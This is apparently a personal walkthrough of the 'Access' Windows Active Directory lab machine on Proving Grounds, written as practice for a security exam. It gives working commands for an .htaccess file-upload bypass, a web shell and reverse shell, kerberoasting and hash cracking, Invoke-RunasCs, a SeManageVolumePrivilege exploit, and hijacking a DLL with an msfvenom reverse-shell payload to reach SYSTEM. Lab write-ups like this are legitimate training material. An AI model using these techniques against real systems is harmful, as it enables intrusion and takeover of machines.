Access
Source: Proving Grounds OS: Windows Community Rating: Very Hard
Enumeration & Reconnaissance
Started with autorecon again. it showed lots and lots of ports, so there's no point in listing them all.
Service Analysis
I began with HTTP (80), which was a simple page featuring a "buy ticket" function that included a file upload capability.

The fuzzers in the background also exposed the "uploads" directory, so cool, I guess we need to upload a shell.
Gaining Initial Access
I first tried uploading a PHP shell, but nothing worked. I attempted known file upload restriction bypasses, null byte, different extension names, double extensions, but none of them did the trick.
Then I tried another approach: what if I created a new extension that gets treated as PHP? This is where .htaccess comes in handy. I created a .htaccess file with the following content:
AddType application/x-httpd-php .puss

I then uploaded this file and it worked, the file got uploaded (note that it doesn’t appear in the uploads directory because it’s a hidden file).

Now that this is in place, I can upload files with the .puss extension and they will be treated as PHP files. So I uploaded my shell again, this time with the .puss extension, and it worked. Now I have a web shell. Using the web shell, I uploaded a reverse shell and ran it, now we got a reverse shell.

I checked the user I got the shell as and it was access\svc_apache. I then uploaded winPEAS and ran it to check for privilege escalation. It showed that we are in a domain, access.offsec (no surprises, I knew it was an AD machine I was preparing for), and there is another user, svc_mssql.

Lateral Movement & Privilege Escalation
I tried the FullPowers script that attempts to restore privileges of service accounts, but that didn’t work. I checked for other PE vectors using the svc_apache account but nothing obvious hit, so I turned to lateral movement targeting svc_mssql. Since it’s an Active Directory machine, I applied some techniques I had been learning over the past few weeks.

I started with kerberoasting. I uploaded rubeus.exe and ran:
.\Rubeus.exe kerberoast /outfile:hash #Got the hash
sudo hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force #Crack the hash

This revealed the password to be trustno1.

Now we have credentials for svc_mssql. I tried using these newly acquired credentials through various methods:
evil-winrm -i 192.168.113.187 -u svc_mssql -p trustno1
impacket-psexec svc_mssql@192.168.113.187


Both didn’t work, the account had no access to the SMB shares, so that failed. I then tried runas:
runas /user:access.offsec\svc_mssql cmd.exe

That wouldn’t let me type the password. I then tried a new tool, Invoke-RunasCs. I uploaded the PowerShell script, ran:
powershell -ep bypass
Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:\Users\Public\shell1.exe"

Now that we are in as svc_mssql. I checked around for further privilege escalation vectors but there was no the usual impersonate privilege. I tried FullPowers but still nothing. After searching further, I discovered I could use the SeManageVolumePrivilege to escalate.
Someone had made a PoC on GitHub that granted access to the entire C: drive:
.\SeManageVolumeExploit.exe

Now that we have access over the C: drive we have multiple ways to escalate our privilege. According to the PoC, one method involved overwriting a DLL. The steps were:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.201 LPORT=9915 -f dll -o shell.dll #Create a dll reverse shell.
C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll #Replace the Printconfig.dll with the malicious dll.
#Initiate the PrintNotify object by executing the following PowerShell commands:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
Doing this, I got back a shell as SYSTEM.

Lessons Learned
File upload restrictions can sometimes be bypassed by redefining file types using .htaccess. This allowed me to execute PHP code from a non-standard extension.
In AD environments, lateral movement using kerberoasting is an effective method to pivot from one service account to another.
When standard privilege escalation tools (like FullPowers) don’t work, alternative vectors, such as abusing SeManageVolumePrivilege, can provide a path to SYSTEM.
Last updated